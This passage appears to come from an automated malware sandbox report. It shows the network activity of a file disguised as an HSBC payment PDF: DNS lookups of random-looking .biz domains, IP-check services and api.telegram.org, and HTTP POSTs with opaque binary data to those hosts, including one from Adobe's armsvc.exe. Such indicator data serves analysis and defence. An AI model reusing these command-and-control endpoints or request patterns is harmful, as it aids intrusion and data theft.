                                                                                                                                                  Dec 10, 2024 16:24:55.833307028 CET804981582.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:55.833385944 CET4981580192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:55.833528042 CET4981580192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:55.833553076 CET4981580192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:55.953087091 CET804981582.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:55.953105927 CET804981582.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:17.746329069 CET804981582.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:17.749310017 CET4981580192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:17.806333065 CET4981580192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:17.925880909 CET804981582.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:19.098836899 CET4987280192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:19.262886047 CET804987282.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:19.262975931 CET4987280192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:19.263192892 CET4987280192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:19.263308048 CET4987280192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:19.425132990 CET804987282.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:19.425146103 CET804987282.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:29.336591005 CET8049708193.122.6.168192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:29.336682081 CET4970880192.168.2.7193.122.6.168
                                                                                                                                                  Dec 10, 2024 16:25:31.350153923 CET804974172.52.179.174192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:31.350229025 CET4974180192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:25:31.350336075 CET4974180192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:25:31.469614029 CET804974172.52.179.174192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:41.188249111 CET804987282.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:41.188309908 CET4987280192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:41.188911915 CET4987280192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:41.196644068 CET4991680192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:41.308339119 CET804987282.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:41.316071987 CET804991682.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:41.316159964 CET4991680192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:41.324840069 CET4991680192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:41.324919939 CET4991680192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:25:41.444447041 CET804991682.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:41.444581985 CET804991682.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:58.687853098 CET4970880192.168.2.7193.122.6.168
                                                                                                                                                  Dec 10, 2024 16:25:58.807357073 CET8049708193.122.6.168192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:03.215996981 CET804991682.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:03.216077089 CET4991680192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:26:04.099107027 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:26:04.115169048 CET4991680192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:26:04.220069885 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:04.220127106 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:26:04.234675884 CET804991682.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:04.754178047 CET4996680192.168.2.747.129.31.212
                                                                                                                                                  Dec 10, 2024 16:26:04.873568058 CET804996647.129.31.212192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:04.873647928 CET4996680192.168.2.747.129.31.212
                                                                                                                                                  Dec 10, 2024 16:26:04.881828070 CET4996680192.168.2.747.129.31.212
                                                                                                                                                  Dec 10, 2024 16:26:04.881864071 CET4996680192.168.2.747.129.31.212
                                                                                                                                                  Dec 10, 2024 16:26:05.001605034 CET804996647.129.31.212192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:05.001617908 CET804996647.129.31.212192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:06.959920883 CET804996647.129.31.212192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:06.959955931 CET804996647.129.31.212192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:06.960016966 CET4996680192.168.2.747.129.31.212
                                                                                                                                                  Dec 10, 2024 16:26:07.243092060 CET4996680192.168.2.747.129.31.212
                                                                                                                                                  Dec 10, 2024 16:26:07.491789103 CET804996647.129.31.212192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:07.978811979 CET4997280192.168.2.713.251.16.150
                                                                                                                                                  Dec 10, 2024 16:26:08.098170996 CET804997213.251.16.150192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:08.098263979 CET4997280192.168.2.713.251.16.150
                                                                                                                                                  Dec 10, 2024 16:26:08.098440886 CET4997280192.168.2.713.251.16.150
                                                                                                                                                  Dec 10, 2024 16:26:08.098464966 CET4997280192.168.2.713.251.16.150
                                                                                                                                                  Dec 10, 2024 16:26:08.218617916 CET804997213.251.16.150192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:08.218683958 CET804997213.251.16.150192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:10.184322119 CET804997213.251.16.150192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:10.184428930 CET804997213.251.16.150192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:10.184497118 CET4997280192.168.2.713.251.16.150
                                                                                                                                                  Dec 10, 2024 16:26:10.186763048 CET4997280192.168.2.713.251.16.150
                                                                                                                                                  Dec 10, 2024 16:26:10.308197021 CET804997213.251.16.150192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:10.788422108 CET4997880192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:26:10.911365032 CET804997844.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:10.914324045 CET4997880192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:26:10.914565086 CET4997880192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:26:10.914565086 CET4997880192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:26:11.153440952 CET804997844.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:11.153460979 CET804997844.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:12.340123892 CET804997844.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:12.340250969 CET804997844.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:12.340301037 CET4997880192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:26:12.340301037 CET4997880192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:26:12.460459948 CET804997844.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:13.559483051 CET4998480192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:26:13.685396910 CET804998418.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:13.685497046 CET4998480192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:26:13.685950994 CET4998480192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:26:13.685950994 CET4998480192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:26:13.806757927 CET804998418.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:13.806847095 CET804998418.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:16.152347088 CET804998418.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:16.152421951 CET804998418.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:16.152518988 CET4998480192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:26:16.152580976 CET4998480192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:26:16.271867037 CET804998418.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:16.691895962 CET4999080192.168.2.7172.234.222.143
                                                                                                                                                  Dec 10, 2024 16:26:16.815881014 CET8049990172.234.222.143192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:16.815989971 CET4999080192.168.2.7172.234.222.143
                                                                                                                                                  Dec 10, 2024 16:26:16.889905930 CET4999080192.168.2.7172.234.222.143
                                                                                                                                                  Dec 10, 2024 16:26:16.889938116 CET4999080192.168.2.7172.234.222.143
                                                                                                                                                  Dec 10, 2024 16:26:17.009995937 CET8049990172.234.222.143192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:17.014801025 CET8049990172.234.222.143192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:17.973221064 CET8049990172.234.222.143192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:18.093559027 CET4999080192.168.2.7172.234.222.143
                                                                                                                                                  Dec 10, 2024 16:26:18.218674898 CET4999580192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:26:18.338382959 CET804999572.52.179.174192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:18.338541031 CET4999580192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:26:18.338757992 CET4999580192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:26:18.458513975 CET804999572.52.179.174192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:19.515204906 CET804999572.52.179.174192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:19.734239101 CET4999580192.168.2.772.52.179.174

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Dec 10, 2024 16:24:11.692176104 CET5915853192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:12.284240007 CET53591581.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:12.329438925 CET6323153192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:12.470489979 CET53632311.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:14.279803038 CET6102953192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:14.417388916 CET53610291.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:14.483979940 CET5730953192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:15.087081909 CET53573091.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:16.758785009 CET5127053192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:16.896429062 CET53512701.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:17.320835114 CET6347953192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:17.888187885 CET53634791.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:19.446871996 CET6157953192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:20.039160013 CET53615791.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:22.340003967 CET6429853192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:22.874125004 CET53642981.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:24.708389997 CET5296253192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:24.711930990 CET5515953192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:24.849324942 CET53551591.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:25.054045916 CET53529621.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.351454020 CET5169653192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:26.787070990 CET53516961.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.760263920 CET5042053192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:28.997746944 CET53504201.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.998497963 CET6389253192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:29.791650057 CET53638921.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:32.078995943 CET6450353192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:32.319088936 CET53645031.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:32.319715023 CET6310853192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:32.560697079 CET53631081.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:32.561521053 CET5730353192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:24:33.501580954 CET53573031.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:25:17.876512051 CET6266953192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:25:18.856405973 CET53626691.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:04.117433071 CET5155153192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:26:04.720539093 CET53515511.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:07.243876934 CET5492853192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:26:07.969813108 CET53549281.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:10.187421083 CET6264953192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:26:10.760751009 CET53626491.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:12.341001987 CET6170253192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:26:12.949174881 CET53617021.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:16.153940916 CET5234653192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:26:16.651339054 CET53523461.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:17.978765965 CET5606653192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:26:18.217648983 CET53560661.1.1.1192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:26:19.518667936 CET5964053192.168.2.71.1.1.1
                                                                                                                                                  Dec 10, 2024 16:26:19.951618910 CET53596401.1.1.1192.168.2.7

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Dec 10, 2024 16:24:11.692176104 CET192.168.2.71.1.1.10x2d01Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:12.329438925 CET192.168.2.71.1.1.10x119Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:14.279803038 CET192.168.2.71.1.1.10x27e3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:14.483979940 CET192.168.2.71.1.1.10x6e7bStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:16.758785009 CET192.168.2.71.1.1.10x1c3bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:17.320835114 CET192.168.2.71.1.1.10x98fbStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:19.446871996 CET192.168.2.71.1.1.10x6dbaStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:22.340003967 CET192.168.2.71.1.1.10xc542Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:24.708389997 CET192.168.2.71.1.1.10xc858Standard query (0)ww99.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:24.711930990 CET192.168.2.71.1.1.10x73ceStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:26.351454020 CET192.168.2.71.1.1.10x5c77Standard query (0)ww12.przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:28.760263920 CET192.168.2.71.1.1.10xe5d3Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:28.998497963 CET192.168.2.71.1.1.10x8650Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:32.078995943 CET192.168.2.71.1.1.10xbaa2Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:32.319715023 CET192.168.2.71.1.1.10x5083Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:32.561521053 CET192.168.2.71.1.1.10x6b91Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:25:17.876512051 CET192.168.2.71.1.1.10xa568Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:04.117433071 CET192.168.2.71.1.1.10xdbc9Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:07.243876934 CET192.168.2.71.1.1.10xc9d2Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:10.187421083 CET192.168.2.71.1.1.10xd867Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:12.341001987 CET192.168.2.71.1.1.10x2591Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:16.153940916 CET192.168.2.71.1.1.10x205dStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:17.978765965 CET192.168.2.71.1.1.10x9027Standard query (0)ww99.fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:19.518667936 CET192.168.2.71.1.1.10x910cStandard query (0)ww12.fwiwk.bizA (IP address)IN (0x0001)false

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Dec 10, 2024 16:24:12.284240007 CET1.1.1.1192.168.2.70x2d01No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:12.470489979 CET1.1.1.1192.168.2.70x119No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:14.417388916 CET1.1.1.1192.168.2.70x27e3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:14.417388916 CET1.1.1.1192.168.2.70x27e3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:14.417388916 CET1.1.1.1192.168.2.70x27e3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:14.417388916 CET1.1.1.1192.168.2.70x27e3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:14.417388916 CET1.1.1.1192.168.2.70x27e3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:14.417388916 CET1.1.1.1192.168.2.70x27e3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:15.087081909 CET1.1.1.1192.168.2.70x6e7bNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:16.896429062 CET1.1.1.1192.168.2.70x1c3bNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:16.896429062 CET1.1.1.1192.168.2.70x1c3bNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:17.888187885 CET1.1.1.1192.168.2.70x98fbNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:20.039160013 CET1.1.1.1192.168.2.70x6dbaNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:22.874125004 CET1.1.1.1192.168.2.70xc542No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:22.874125004 CET1.1.1.1192.168.2.70xc542No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:24.849324942 CET1.1.1.1192.168.2.70x73ceNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:25.054045916 CET1.1.1.1192.168.2.70xc858No error (0)ww99.przvgke.biz72.52.179.174A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:26.787070990 CET1.1.1.1192.168.2.70x5c77No error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:26.787070990 CET1.1.1.1192.168.2.70x5c77No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:26.787070990 CET1.1.1.1192.168.2.70x5c77No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:28.997746944 CET1.1.1.1192.168.2.70xe5d3Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:29.791650057 CET1.1.1.1192.168.2.70x8650No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:32.319088936 CET1.1.1.1192.168.2.70xbaa2Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:32.560697079 CET1.1.1.1192.168.2.70x5083Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:24:33.501580954 CET1.1.1.1192.168.2.70x6b91No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:25:18.856405973 CET1.1.1.1192.168.2.70xa568No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:04.720539093 CET1.1.1.1192.168.2.70xdbc9No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:07.969813108 CET1.1.1.1192.168.2.70xc9d2No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:10.760751009 CET1.1.1.1192.168.2.70xd867No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:12.949174881 CET1.1.1.1192.168.2.70x2591No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:16.651339054 CET1.1.1.1192.168.2.70x205dNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:16.651339054 CET1.1.1.1192.168.2.70x205dNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:18.217648983 CET1.1.1.1192.168.2.70x9027No error (0)ww99.fwiwk.biz72.52.179.174A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:19.951618910 CET1.1.1.1192.168.2.70x910cNo error (0)ww12.fwiwk.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:19.951618910 CET1.1.1.1192.168.2.70x910cNo error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                  Dec 10, 2024 16:26:19.951618910 CET1.1.1.1192.168.2.70x910cNo error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                                  • api.telegram.org
                                                                                                                                                  • pywolwnvd.biz
                                                                                                                                                  • checkip.dyndns.org
                                                                                                                                                  • ssbzmoy.biz
                                                                                                                                                  • cvgrf.biz
                                                                                                                                                  • npukfztj.biz
                                                                                                                                                  • przvgke.biz
                                                                                                                                                  • ww99.przvgke.biz
                                                                                                                                                  • ww12.przvgke.biz
                                                                                                                                                  • knjghuig.biz
                                                                                                                                                  • lpuegx.biz
                                                                                                                                                  • vjaxhpbji.biz
                                                                                                                                                  • xlfhhhm.biz
                                                                                                                                                  • ifsaia.biz
                                                                                                                                                  • saytjshyf.biz
                                                                                                                                                  • vcddkls.biz
                                                                                                                                                  • fwiwk.biz
                                                                                                                                                  • ww99.fwiwk.biz

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.74970154.244.188.177803232C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:24:13.038033962 CET351OUTPOST /mgppdv HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: pywolwnvd.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 898
                                                                                                                                                  Dec 10, 2024 16:24:13.038115978 CET898OUTData Raw: ef f0 f5 3a 1c 57 34 63 76 03 00 00 20 5b 0f e7 9d c2 13 40 f7 98 d4 02 2c f9 08 ff 4e 54 57 90 7e 51 47 e7 10 3b 9a a2 90 7d c2 fd fd b8 22 8c 15 af 33 5e 6a e4 ce 69 9f af e8 f4 32 44 07 00 6f e6 7b 6e 2e bb ec 6a 8f 78 bb b2 70 cc a9 ff c1 cd
                                                                                                                                                  Data Ascii: :W4cv [@,NTW~QG;}"3^ji2Do{n.jxp-'z$Y*7+|VK21]M|XUvwm<}A,k:{6x 0N5UML`]I@`S B6.Qz=^4j=w uV
                                                                                                                                                  Dec 10, 2024 16:24:14.337663889 CET413INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:14 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: btst=3dab21979f5b10af5d915d23a3c4b082|8.46.123.175|1733844254|1733844254|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                  Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.74970254.244.188.177806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:24:13.134259939 CET361OUTPOST /leanpmxsxneexgiv HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: pywolwnvd.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
